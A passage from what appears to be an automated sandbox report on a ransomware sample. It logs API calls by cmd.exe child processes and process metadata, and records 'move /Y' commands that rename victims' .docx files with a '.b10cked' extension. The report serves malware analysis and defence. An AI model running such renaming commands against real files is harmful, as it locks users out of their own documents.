lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x40, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x40, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x40, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.974] RegCloseKey (hKey=0x40) returned 0x0 [0135.974] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9b4 | out: phkResult=0x30e9b4*=0x40) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x40, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x1, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x1, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x0, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9bc, 
lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x9, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x4, lpData=0x30e9c0*=0x9, lpcbData=0x30e9b8*=0x4) returned 0x0 [0135.974] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9bc, lpData=0x30e9c0, lpcbData=0x30e9b8*=0x1000 | out: lpType=0x30e9bc*=0x0, lpData=0x30e9c0*=0x9, lpcbData=0x30e9b8*=0x1000) returned 0x2 [0135.974] RegCloseKey (hKey=0x40) returned 0x0 [0135.974] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0135.974] srand (_Seed=0x5b88636a) [0135.974] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"" [0135.974] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked\"" [0135.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.974] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1018c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0135.975] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.975] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.975] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") 
returned 0x0 [0135.975] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.975] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.975] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.975] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.975] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.975] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.975] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.975] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.975] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.975] GetEnvironmentStringsW () returned 0x1022b8* [0135.975] FreeEnvironmentStringsW (penv=0x1022b8) returned 1 [0135.975] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.975] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.975] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.975] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.975] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.975] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.975] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.975] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.975] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.975] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.975] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f780 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.975] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f780, lpFilePart=0x30f77c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f77c*="Desktop") 
returned 0x18 [0135.975] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.976] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f4fc | out: lpFindFileData=0x30f4fc) returned 0xffff8 [0135.976] FindClose (in: hFindFile=0xffff8 | out: hFindFile=0xffff8) returned 1 [0135.976] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f4fc | out: lpFindFileData=0x30f4fc) returned 0xffff8 [0135.976] FindClose (in: hFindFile=0xffff8 | out: hFindFile=0xffff8) returned 1 [0135.976] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f4fc | out: lpFindFileData=0x30f4fc) returned 0xffff8 [0135.976] FindClose (in: hFindFile=0xffff8 | out: hFindFile=0xffff8) returned 1 [0135.976] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0135.976] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0135.976] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0135.976] GetEnvironmentStringsW () returned 0x102ad8* [0135.976] FreeEnvironmentStringsW (penv=0x102ad8) returned 1 [0135.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.977] GetConsoleOutputCP () returned 0x1b5 [0135.977] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0135.977] GetUserDefaultLCID () returned 0x409 [0135.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0135.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f8c0, cchData=128 | out: lpLCData="0") returned 2 [0135.977] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f8c0, cchData=128 | out: lpLCData="0") returned 2 [0135.977] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f8c0, cchData=128 | out: lpLCData="1") returned 2 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0135.978] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0135.978] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.979] GetConsoleTitleW (in: lpConsoleTitle=0xf08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.979] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0135.979] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0135.979] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0135.979] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0135.980] _wcsicmp (_String1="move", _String2=")") returned 
68 [0135.980] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0135.980] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0135.980] _wcsicmp (_String1="IF", _String2="move") returned -4 [0135.980] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0135.980] _wcsicmp (_String1="REM", _String2="move") returned 5 [0135.980] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0135.982] GetConsoleTitleW (in: lpConsoleTitle=0x30f5b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.983] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0135.983] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0135.983] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0135.983] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0135.983] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="CD") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0135.983] _wcsicmp (_String1="move", _String2="REN") returned -5 [0135.983] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0135.983] _wcsicmp (_String1="move", _String2="SET") returned -6 [0135.983] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0135.983] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0135.983] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0135.983] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0135.983] _wcsicmp (_String1="move", _String2="MD") returned 11 [0135.983] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0135.983] _wcsicmp (_String1="move", _String2="RD") returned -5 [0135.983] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0135.983] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0135.983] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0135.983] _wcsicmp (_String1="move", _String2="SHIFT") 
returned -6 [0135.983] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0135.983] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0135.983] _wcsicmp (_String1="move", _String2="VER") returned -9 [0135.983] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0135.983] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0135.983] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0135.983] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0135.983] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0135.983] _wcsicmp (_String1="move", _String2="START") returned -6 [0135.983] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0135.983] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0135.983] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0135.985] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.985] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.985] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f374, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f36c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f36c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.985] _wcsnicmp 
(_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.985] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.986] _wcsnicmp (_String1="COPYCMD", 
_String2="USERDOM", _MaxCount=0x7) returned -18 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.986] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.986] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0135.986] _wcsicmp (_String1="D2POZD~1.DOC", _String2=".") returned 54 [0135.986] _wcsicmp (_String1="D2POZD~1.DOC", _String2="..") returned 54 [0135.986] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozd~1.doc")) returned 0x20 [0135.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x101d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0135.987] SetErrorMode (uMode=0x0) returned 0x0 [0135.987] SetErrorMode (uMode=0x1) returned 0x0 [0135.987] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", nBufferLength=0x104, lpBuffer=0x30ecfc, lpFilePart=0x30ece4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", lpFilePart=0x30ece4*="D2POZD~1.DOC") returned 0x26 [0135.987] SetErrorMode (uMode=0x0) returned 0x1 [0135.987] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0135.987] _wcsicmp (_String1="D2POZD~1.DOC", _String2=".") returned 54 [0135.987] _wcsicmp (_String1="D2POZD~1.DOC", _String2="..") returned 54 [0135.987] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozd~1.doc")) returned 0x20 [0135.987] SetErrorMode (uMode=0x0) returned 0x0 [0135.987] SetErrorMode (uMode=0x1) returned 0x0 [0135.987] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", nBufferLength=0x104, lpBuffer=0x30f178, lpFilePart=0x30ef10 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", 
lpFilePart=0x30ef10*="D2POZD~1.DOC") returned 0x26 [0135.988] SetErrorMode (uMode=0x0) returned 0x1 [0135.988] SetErrorMode (uMode=0x0) returned 0x0 [0135.988] SetErrorMode (uMode=0x1) returned 0x0 [0135.988] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked", nBufferLength=0x104, lpBuffer=0x30f380, lpFilePart=0x30ef10 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked", lpFilePart=0x30ef10*="D2poZdDEdi.docx.b10cked") returned 0x31 [0135.988] SetErrorMode (uMode=0x0) returned 0x1 [0135.988] SetLastError (dwErrCode=0x0) [0135.988] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozddedi.docx.b10cked")) returned 0xffffffff [0135.988] GetLastError () returned 0x2 [0135.988] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x30e88c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e88c) returned 0xf0f08 [0135.988] FindNextFileW (in: hFindFile=0xf0f08, lpFindFileData=0x30e88c | out: lpFindFileData=0x30e88c) returned 0 [0135.989] GetLastError () returned 0x12 [0135.989] FindClose (in: hFindFile=0xf0f08 | out: hFindFile=0xf0f08) returned 1 [0135.989] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2POZD~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x101ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x101ae0) returned 0xf0f08 [0135.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked", nBufferLength=0x104, lpBuffer=0x30eb24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked", lpFilePart=0x0) returned 0x31 [0135.990] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx", nBufferLength=0x104, lpBuffer=0x30eb24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx", 
lpFilePart=0x0) returned 0x29 [0135.990] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozddedi.docx")) returned 0x20 [0135.990] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozddedi.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\D2poZdDEdi.docx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\d2pozddedi.docx.b10cked"), dwFlags=0x3) returned 1 [0135.990] FindClose (in: hFindFile=0xf0f08 | out: hFindFile=0xf0f08) returned 1 [0135.990] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30ead8 | out: _Buffer=" 1") returned 9 [0135.990] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.990] GetFileType (hFile=0x7) returned 0x2 [0136.070] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.070] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30ea64 | out: lpMode=0x30ea64) returned 1 [0136.070] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.070] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ea98 | out: lpConsoleScreenBufferInfo=0x30ea98) returned 1 [0136.070] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.070] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30ead8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.070] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30eabc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30eabc*=0x1a) returned 1 [0136.071] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.071] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.071] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0136.071] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.071] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.071] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.071] SetConsoleInputExeNameW () returned 0x1 [0136.071] GetConsoleOutputCP () returned 0x1b5 [0136.071] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.071] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.071] exit (_Code=0) Process: id = "138" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13674 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13675 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13676 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13677 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 
region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13678 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13679 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13680 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13681 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13682 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 13683 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14073 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14074 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = 